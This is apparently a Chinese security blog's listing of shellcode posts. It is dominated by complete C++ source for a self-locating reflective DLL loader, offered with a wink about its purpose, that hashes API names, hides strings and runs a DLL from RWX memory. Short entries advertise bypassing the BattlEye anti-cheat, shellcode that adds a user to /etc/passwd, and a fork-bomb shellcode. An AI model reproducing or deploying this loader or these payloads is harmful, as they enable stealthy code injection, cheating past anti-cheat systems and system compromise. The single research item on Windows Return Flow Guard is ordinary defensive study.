二进制安全游戏安全渗透复现汇编Shellcode [2020]自定位+内存加载shellcode 可用于驱动+R3通用 用来干什么懂的都懂 ```cpp #define HUOJI_POOL_TAG 'huoJ' #define CALCSIZE(n,f) (ULONG_PTR)f - (ULONG_PTR)n #define PAGE_ALIGN(Va) ((PVOID)((ULONG_PTR)(Va) & ~(PAGE_SIZE - 1))) typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); typedef FARPROC(WINAPI* GETPROCADDRESS)(HMODULE, LPCSTR); typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); typedef DWORD(NTAPI* NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG); typedef BOOL(WINAPI* ReadFileT)(HANDLE, LPVOID, DWORD, LPDWORD, PVOID); typedef HANDLE(WINAPI* CreateFileAT)(LPCSTR, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE); typedef DWORD(WINAPI* GetFileSizeT)(HANDLE, LPDWORD); typedef BOOL(WINAPI* CloseHandleT)(HANDLE); #define KERNEL32DLL_HASH 0x6A4ABC5B #define NTDLLDLL_HASH 0x3CFA685D #define LOADLIBRARYA_HASH 0xEC0E4E8E #define GETPROCADDRESS_HASH 0x7C0DFCAA #define VIRTUALALLOC_HASH 0x91AFCA54 #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 #define HASH_KEY 13 #define DLL_PROCESS_ATTACH 1 #define DLL_THREAD_ATTACH 2 #define DLL_THREAD_DETACH 3 #define DLL_PROCESS_DETACH 0 typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID); #ifndef PXE_BASE #define PXE_BASE 0xFFFFF6FB7DBED000UI64 #endif #ifndef PXE_SELFMAP #define PXE_SELFMAP 0xFFFFF6FB7DBEDF68UI64 #endif #ifndef PPE_BASE #define PPE_BASE 0xFFFFF6FB7DA00000UI64 #endif #ifndef PDE_BASE #define PDE_BASE 0xFFFFF6FB40000000UI64 #endif #ifndef PTE_BASE #define PTE_BASE 0xFFFFF68000000000UI64 #endif typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImages; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; union { LIST_ENTRY HashLinks; struct { PVOID SectionPointer; ULONG CheckSum; }; }; union { struct { ULONG TimeDateStamp; }; struct { PVOID LoadedImports; }; }; }LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; typedef struct { WORD offset : 12; WORD type : 4; } IMAGE_RELOC, * PIMAGE_RELOC; VOID WINAPI RemoteLoadStart() { LOADLIBRARYA pLoadLibraryA = NULL; GETPROCADDRESS pGetProcAddress = NULL; VIRTUALALLOC pVirtualAlloc = NULL; NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; ReadFileT pReadFile = NULL; CreateFileAT pCreateFile = NULL; GetFileSizeT pGetFileSize = NULL; CloseHandleT pCloseHandle = NULL; USHORT usCounter; ULONG_PTR uiBaseAddress; ULONG_PTR uiAddressArray; ULONG_PTR uiNameArray; ULONG_PTR uiExportDir; ULONG_PTR uiNameOrdinals; DWORD dwHashValue; ULONG_PTR uiHeaderValue; ULONG_PTR uiValueA; ULONG_PTR uiValueB; ULONG_PTR uiValueC; ULONG_PTR uiValueD; ULONG_PTR uiValueE; uiBaseAddress = __readgsqword(0x60); uiBaseAddress = *(PDWORD64)((PUCHAR)uiBaseAddress + 0x18); uiValueA = (ULONG_PTR)(*(PLIST_ENTRY)((PUCHAR)uiBaseAddress + 0x10)).Flink; ULONG_PTR Kernel32Base, NTDllBase; while (uiValueA) { uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Buffer; usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; uiValueC = 0; do { uiValueC = _rotr((DWORD)uiValueC, HASH_KEY); if (*((BYTE*)uiValueB) >= 'a') uiValueC += *((BYTE*)uiValueB) - 0x20; else uiValueC += *((BYTE*)uiValueB); uiValueB++; } while (--usCounter); if ((DWORD)uiValueC == KERNEL32DLL_HASH) { uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; Kernel32Base = uiBaseAddress; uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); usCounter = 3; while (usCounter > 0) { char* c = (char*)(uiBaseAddress + DEREF_32(uiNameArray)); register DWORD h = 0; do { h = _rotr(h, HASH_KEY); h += *c; } while (*++c); dwHashValue = h; if (dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH) { uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); if (dwHashValue == LOADLIBRARYA_HASH) pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray)); else if (dwHashValue == GETPROCADDRESS_HASH) pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray)); else if (dwHashValue == VIRTUALALLOC_HASH) pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray)); usCounter--; } uiNameArray += sizeof(DWORD); uiNameOrdinals += sizeof(WORD); } } else if ((DWORD)uiValueC == NTDLLDLL_HASH) { uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; NTDllBase = uiBaseAddress; uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); usCounter = 1; while (usCounter > 0) { char* c = (char*)(uiBaseAddress + DEREF_32(uiNameArray)); register DWORD h = 0; do { h = _rotr(h, HASH_KEY); h += *c; } while (*++c); dwHashValue = h; if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) { uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray)); usCounter--; } uiNameArray += sizeof(DWORD); uiNameOrdinals += sizeof(WORD); } } if (pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache) break; uiValueA = DEREF(uiValueA); } /* 加载shellcode */ PVOID dwStrings = pVirtualAlloc(NULL, 12, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x64616552; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x656c6946; pReadFile = (ReadFileT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x61657243; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x69466574; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x41656c; pCreateFile = (CreateFileAT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x46746547; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x53656c69; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x657a69; pGetFileSize = (GetFileSizeT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x736f6c43; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x6e614865; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x656c64; pCloseHandle = (CloseHandleT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings); /* C:\\test.dll 433a2f74 6573742e 646c6c change your self */ *(DWORD64*)((PCHAR)dwStrings + 0x0) = 0x742f3a43; *(DWORD64*)((PCHAR)dwStrings + 0X4) = 0x2e747365; *(DWORD64*)((PCHAR)dwStrings + 0X8) = 0x6c6c64; HANDLE hFile = pCreateFile((LPCSTR)dwStrings, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, 3, 0, NULL); DWORD mSize = pGetFileSize(hFile, NULL); ULONG_PTR uiLibraryAddress = (ULONG_PTR)pVirtualAlloc(NULL, mSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); pReadFile(hFile, (LPVOID)uiLibraryAddress, mSize, NULL, NULL); pCloseHandle(hFile); uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; uiValueB = uiLibraryAddress; uiValueC = uiBaseAddress; while (uiValueA--) *(BYTE*)uiValueC++ = *(BYTE*)uiValueB++; uiValueA = ((ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader); uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; while (uiValueE--) { uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress); uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData); uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; while (uiValueD--) *(BYTE*)uiValueB++ = *(BYTE*)uiValueC++; uiValueA += sizeof(IMAGE_SECTION_HEADER); } uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name) { uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk); uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk); while (DEREF(uiValueA)) { if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG) { uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD)); DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray)); } else { uiValueB = (uiBaseAddress + DEREF(uiValueA)); DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); } uiValueA += sizeof(ULONG_PTR); if (uiValueD) uiValueD += sizeof(ULONG_PTR); } uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR); } uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size) { uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock) { uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress); uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC); uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); while (uiValueB--) { if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64) *(ULONG_PTR*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW) *(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH) *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW) *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); uiValueD += sizeof(IMAGE_RELOC); } uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; } } uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint); pNtFlushInstructionCache((HANDLE)-1, NULL, 0); ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL); } int RemoteLoadEnd() { return 0x77132; } ``` 阅读全文 2020-12-27 huoji 0 条评论
二进制安全游戏安全C/C++汇编Shellcode [2020]BattlEye 客户端模拟 The popular anti-cheat BattlEye is widely used by modern online games such as Escape from Tarkov and is considered an industry standard anti-cheat by many. In this article I will demonstrate a method I have been utilizing for the past year, which enables you to play any BattlEye-protected game online without even having to install BattlEye. 阅读全文 2020-07-23 huoji 0 条评论
二进制安全游戏安全Shellcode [2020]BattlEye shellcode 结合之前的文章分析: [之前的文章](https://key08.com/index.php/2019/11/06/50.html "之前的文章") 下载: https://github.com/huoji120/battleye 阅读全文 2020-01-10 huoji 0 条评论
二进制安全汇编Shellcode [2012]同时作为exe,dll,shellcode运行,自解密自解压 [shell_dll_exe.txt](https://key08.com/usr/uploads/2019/11/2394101918.txt) 阅读全文 2019-11-29 huoji 0 条评论
二进制安全Shellcode [2018]Windows 10 x64中的RFG(Return Flow Guard)技术研究 RFG(Return Flow Guard)是在最近的windows10x64里面加入的最新的防护措施。用来防止对栈上返回地址的篡改。 不同于/GS策略,RFG是由编译器和操作系统共同来支持的特性,防御强度远远高于/GS方式。在这里微软首次引入Thread Controlstack 概念(也可以称之为影子堆栈)完成了对篡改返回地址的这种长久以来的攻击方式的的强力反击。 [目录] [0x01].背景介绍 [0x02].防护层面分析 [0x02.1].用户层面fs [0x02.2].内核层面fs [0x02.3].“影子栈”的内存布局 [0x03].突破RFG的可能性 [0x04].致谢 阅读全文 2019-11-16 huoji 0 条评论
二进制安全Shellcode [2019]Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes) Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 Comments: add user "User" to /etc/passwd CVE: N/A 阅读全文 2019-11-08 huoji 0 条评论
Shellcode [2019]Linux/ARM - Fork Bomb Shellcode (20 bytes) Title: Linux/ARM - Fork Bomb Shellcode (20 bytes) Category: Shellcode Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite) Author: CJHackerz Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash 阅读全文 2019-11-08 huoji 0 条评论
